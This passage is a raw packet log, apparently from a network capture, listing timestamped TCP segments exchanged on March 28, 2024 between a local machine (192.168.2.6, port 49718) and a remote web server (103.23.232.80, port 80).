                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309312105 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309319019 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309329987 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309357882 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309392929 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309428930 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309478045 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309489965 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309520006 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309541941 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309597969 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309609890 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309637070 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309667110 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309757948 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309770107 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309792995 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309813976 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309839010 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309840918 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309880018 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309916019 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309932947 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309973001 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.309988976 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310030937 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310153961 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310167074 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310204983 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310378075 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310446978 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310470104 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310496092 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310496092 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310543060 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310554981 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310616970 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310630083 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310635090 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310668945 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310697079 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310725927 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310771942 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310771942 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310812950 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310815096 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310853958 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310894012 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.310961962 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311003923 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311072111 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311220884 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311261892 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311310053 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311353922 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311369896 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311410904 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311427116 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311466932 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311491966 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311541080 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311548948 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311583042 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311609983 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311641932 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311697960 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311723948 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311762094 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311770916 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311803102 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311813116 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311858892 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311894894 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311933994 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311943054 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.311989069 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312000036 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312072039 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312073946 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312108994 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312119961 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312154055 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312233925 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312247038 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312258005 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312283993 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312314034 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312400103 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312412977 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312441111 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312443972 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312469959 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312499046 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312510967 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312546968 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312585115 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312619925 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312766075 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312778950 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312789917 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312813997 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312840939 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312868118 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312880993 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312916994 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312918901 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312951088 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.312993050 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313028097 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313107967 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313121080 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313159943 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313175917 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313261986 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313277960 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313311100 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313323021 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313368082 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313386917 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313415051 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313467026 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313509941 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313519955 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313550949 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313623905 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313744068 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313745022 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313757896 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313782930 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313813925 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.313921928 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314001083 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314022064 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314043999 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314069033 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314115047 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314122915 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314163923 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314191103 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314232111 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314260006 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314285994 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314306021 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314336061 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314349890 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314397097 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314471006 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314515114 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314554930 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314585924 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314603090 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314629078 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314636946 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314650059 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314682961 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314706087 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314734936 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314776897 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314779997 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314821959 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314834118 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314894915 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314917088 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314935923 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.314997911 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315038919 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315232992 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315243959 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315254927 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315277100 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315290928 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315305948 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315336943 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315346003 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315376043 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315386057 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315418005 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315465927 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315517902 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315685987 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315731049 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315773964 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315860033 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315876961 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315891981 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315901995 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315958023 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315973997 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.315989017 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316031933 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316035032 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316077948 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316121101 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316133022 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316162109 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316189051 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316193104 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316227913 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316246986 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316284895 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316309929 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316350937 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316401958 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316442966 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316519022 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316560984 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316565990 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316601992 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316625118 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316665888 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316689014 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316756964 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316811085 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316829920 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316853046 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316864967 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316873074 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316900969 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316931963 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316943884 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316955090 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316967964 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.316977024 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317015886 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317027092 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317039967 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317060947 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317060947 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317095995 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317105055 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317109108 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317117929 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317142963 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317168951 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317179918 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317179918 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317214966 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317220926 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317228079 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317239046 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317260981 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317274094 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317301989 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317317963 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317331076 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317342043 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317354918 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317365885 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317370892 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317387104 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317410946 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317414999 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317420959 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317429066 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317457914 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317477942 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317490101 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317502022 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317538023 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317542076 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317550898 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317563057 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317589045 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317624092 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317624092 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317671061 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317682028 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317693949 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317707062 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317724943 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317739964 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:19.317749977 CET8049718103.23.232.80192.168.2.6
